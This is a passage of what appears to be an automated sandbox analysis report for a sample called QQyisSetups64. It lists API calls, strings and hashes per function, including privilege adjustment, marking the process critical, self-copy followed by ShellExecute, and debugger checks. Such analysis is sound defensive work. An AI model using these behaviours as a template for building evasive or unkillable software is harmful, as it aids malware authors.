                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Sleep$BindingComposeString_swprintf
                                                                                                                                                                                                                      • String ID: 5555555555
                                                                                                                                                                                                                      • API String ID: 4095827290-304217070
                                                                                                                                                                                                                      • Opcode ID: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
                                                                                                                                                                                                                      • Instruction ID: fc69ec1e48ae5d690075e784bcaa941b9f802e524bc258fcaffae97851e079c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B516DB5D00208ABEB14DFD4DC41BEFB7B8EB48340F108118FA05BB686D734AA44DBA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 100045F0: SHGetFolderPathA.SHELL32(00000000,10010479,00000000,00000000,?), ref: 10004611
                                                                                                                                                                                                                        • Part of subcall function 10010380: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100103B3
                                                                                                                                                                                                                        • Part of subcall function 10010330: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001034E
                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,?,00000000), ref: 100105A6
                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 100105CC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ModuleName$CopyExecuteFolderPathShell
                                                                                                                                                                                                                      • String ID: %s\%s$open
                                                                                                                                                                                                                      • API String ID: 1638599526-538903891
                                                                                                                                                                                                                      • Opcode ID: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
                                                                                                                                                                                                                      • Instruction ID: 9fe97893565a199cb231c8e39f665fc81eb16fc602bb536f2ce1346a8447d072
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED5190B4D04248ABEB14CFA0C891BEEBBB5EF05344F508198F5557B282DB75AB88CB51

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 327 1000f080-1000f0a2 328 1000f0a9-1000f0b0 327->328 329 1000f0b6-1000f0d2 call 1000ff70 328->329 330 1000f1fb 328->330 333 1000f0d7-1000f0e1 329->333 331 1000f1fd-1000f200 330->331 334 1000f0e3 333->334 335 1000f0e8-1000f0ef 333->335 334->330 336 1000f0fa-1000f100 335->336 337 1000f1b4-1000f1bb 336->337 338 1000f106-1000f115 336->338 340 1000f1c6-1000f1cc 337->340 339 1000f118-1000f128 338->339 343 1000f12a-1000f12f 339->343 344 1000f15d-1000f162 339->344 341 1000f1e1-1000f1f2 CoTaskMemFree 340->341 342 1000f1ce-1000f1df CoTaskMemFree 340->342 346 1000f1f4 341->346 347 1000f1f6 341->347 342->340 348 1000f131-1000f143 343->348 349 1000f154-1000f15b 343->349 350 1000f165-1000f16f 344->350 346->330 347->328 348->344 351 1000f145-1000f152 348->351 349->350 352 1000f171-1000f178 350->352 353 1000f1af 350->353 351->339 351->349 354 1000f183-1000f189 352->354 353->336 356 1000f18b-1000f19c CoTaskMemFree 354->356 357 1000f19e-1000f1ad CoTaskMemFree 354->357 356->354 357->331
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 1000FF70: NdrClientCall2.RPCRT4 ref: 1000FF8F
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 1000F195
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 1000F1A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeTask$Call2Client
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3085621743-0
                                                                                                                                                                                                                      • Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                                      • Instruction ID: 92fa5dec9f22b8c7c1328a1cbf0c23ece76f2aec65bf6276d958f50508a6dbd7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB51F5B4E04209EBEF04CF94C894AEEB7B1FF48344F20815DE815A7748D735AA85EB91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,10010479,00000000,00000000,?), ref: 10004611
                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(1000D110), ref: 10004659
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Error retrieving folder path, xrefs: 1000463A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: V01@$??6?$basic_ostream@D@std@@@std@@FolderPathU?$char_traits@V01@@
                                                                                                                                                                                                                      • String ID: Error retrieving folder path
                                                                                                                                                                                                                      • API String ID: 1878701816-3197305068
                                                                                                                                                                                                                      • Opcode ID: a8aa29d3985f4dc8b2c07eb66a2b75d398d4273d7149b66bb2f0baa5cd437431
                                                                                                                                                                                                                      • Instruction ID: 3c888e1c673b8af2102680abd9df1d2c946cda7a46348bc231a71b09ea3b55b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8aa29d3985f4dc8b2c07eb66a2b75d398d4273d7149b66bb2f0baa5cd437431
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E012CB4A00208BBEB04DF94CC91FDD7BB5EB49344F108154FA489B254EB71AF90DB91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
                                                                                                                                                                                                                      • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2577077003-0
                                                                                                                                                                                                                      • Opcode ID: 9388572541d754b2583f4810766f488a682949ee9bf3f64af826a3f9bef0217d
                                                                                                                                                                                                                      • Instruction ID: 5f7cab8de45bcdf2407ecebcb5d22f8ee1252467d95dee99cd854b3eb2a3a61a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9388572541d754b2583f4810766f488a682949ee9bf3f64af826a3f9bef0217d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B2117B1900219EBEB04DF94CC95BEEBBB4FF08700F108518F615AB295DB75AA44CBD0

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 383 1000ff40-1000ff6e NdrClientCall2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1775071923-0
                                                                                                                                                                                                                      • Opcode ID: ce7b8f29c0631b2804a26d986689ba3f09b2f6ec28eda86620c8604702a4acd4
                                                                                                                                                                                                                      • Instruction ID: 7492027a281e140068cdac0bb76a9e8e76146da9bd0683f37df95b5dae096a5d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce7b8f29c0631b2804a26d986689ba3f09b2f6ec28eda86620c8604702a4acd4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5ED05EF190100CBBDB05CF88CC42AA977ACE784205F00C069EA0AC6200E931AA904691

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 384 1000ff70-1000ffa1 NdrClientCall2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1775071923-0
                                                                                                                                                                                                                      • Opcode ID: 1bc907cd574dd29b4d3e7ba9f4424db3402ad13f32cce3c6e12345c4effb2575
                                                                                                                                                                                                                      • Instruction ID: 6afe2523060cff6880f9b4da93d12d89cb254fb88d74a93b831ee34bf0bcd51a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bc907cd574dd29b4d3e7ba9f4424db3402ad13f32cce3c6e12345c4effb2575
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69D05EB190000CBBE705CF88CC12AE977ACE785305F00C069EA0A8A240E931AA544691

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 385 1000ffb0-1000ffe1 NdrClientCall2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1775071923-0
                                                                                                                                                                                                                      • Opcode ID: 52255134d6b5ccea6af4de28952c25772812cd8c0d7113a6720df0c67090eddc
                                                                                                                                                                                                                      • Instruction ID: 01a6fe9224db3f7d7e4205a28be5e1d10279d7ad68670d0b988955ce86484041
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52255134d6b5ccea6af4de28952c25772812cd8c0d7113a6720df0c67090eddc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2D05EB190100CBBE705CF88CC02AA977ADE784305F00C169FA0A86240E931AE504691

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 386 1000fff0-10010021 NdrClientCall2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1775071923-0
                                                                                                                                                                                                                      • Opcode ID: 8713d8677658a6df8795b9ebb9893791690b4409c7e532052509524876d5dd8e
                                                                                                                                                                                                                      • Instruction ID: 940d55c7aea47baa15732b8373ec63bb8ecc0fa7aba131a5eb793c07d5a03037
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8713d8677658a6df8795b9ebb9893791690b4409c7e532052509524876d5dd8e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77D05EB290000CBBE705CF88CC02AE977ACE784305F00C069EA0A86240EA31AA504691
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 10001251
                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 1000125F
                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 10001269
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                                                                      • String ID: RtlAdjustPrivilege$RtlSetProcessIsCritical$indow$ndowClass$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 3658383123-467612925
                                                                                                                                                                                                                      • Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                                      • Instruction ID: 32e2e5621d63ba41cde31a5517ede96aa96e783cbb1150e0d99a961b1b18e838
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A331F4B4D40218AFEB14DFE5CC89BDDBBB4FF48701F108119F60AAA294D7749690CB10
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02861A74
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,1001241C,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 02861A9A
                                                                                                                                                                                                                      • SendMessageW.USER32(100176D4,00000409,00000000,00D77800), ref: 02861ACE
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,10001B80,?,00000000,00000000), ref: 02861B20
                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 02861B2B
                                                                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 02861B44
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4292518056-3916222277
                                                                                                                                                                                                                      • Opcode ID: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                                                                      • Instruction ID: cc752dcd52aa9265c7c0a36d6adc18b2905358c888318f77e8925626a8a4a4c9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A3128B8640208FFEB10DF98CC89FAA7BB5EB48705F10C148FA09AB291D770D950CB65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10011259
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000003), ref: 1001127F
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000050), ref: 10011309
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 10011325
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001133E
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 10011348
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_10000000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1045392073-0
                                                                                                                                                                                                                      • Opcode ID: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                                                                      • Instruction ID: 9c1a1b5f42fc978b2ff8cf04cdab4bc874b060df06568115b329f45e6489fc23
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3431E7B5D01228DADB11DFA4D9897CDBBB8FF08700F1041AAE40CAB250EB719B84CF45
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 02871230
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 028712FC
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871315
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0287131F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                      • Opcode ID: 66dfac0479178b899c88c3770155f14939d35e9485ae9a94106db669959441a0
                                                                                                                                                                                                                      • Instruction ID: 1e3d17204ea4d70f8fe26df2cb420316f2559f6a84e611c95aa13b127aea49cc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66dfac0479178b899c88c3770155f14939d35e9485ae9a94106db669959441a0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1531DAB9D01228DBDF21DFA4D9497CDBBB8AF08300F10419AE40CAB250E7759A85CF45
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RpcStringBindingComposeW.RPCRT4(00000000,100124B8,100124E4,100124CC,00000000,02861D65), ref: 0286EE95
                                                                                                                                                                                                                      • RpcBindingFromStringBindingW.RPCRT4(02861D65,00000000), ref: 0286EEB0
                                                                                                                                                                                                                      • RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 0286EEE7
                                                                                                                                                                                                                      • RpcStringFreeW.RPCRT4(02861D65), ref: 0286EEF1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2860000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Binding$String$AuthComposeFreeFromInfo
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1126441048-0
                                                                                                                                                                                                                      • Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                                      • Instruction ID: ae46d6974ea60b10b24dce4f842b24a2ed8d0120ca92f721577ae9fb52ee315a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD11DAB5D00219BFEB14CFE4C989BEEBBB4FB08704F108559E605B7280D7B59A54CBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 100113FB
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1001140A
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10011413
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 10011420
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.1461953610.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1461925767.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462075042.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.1462100832.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
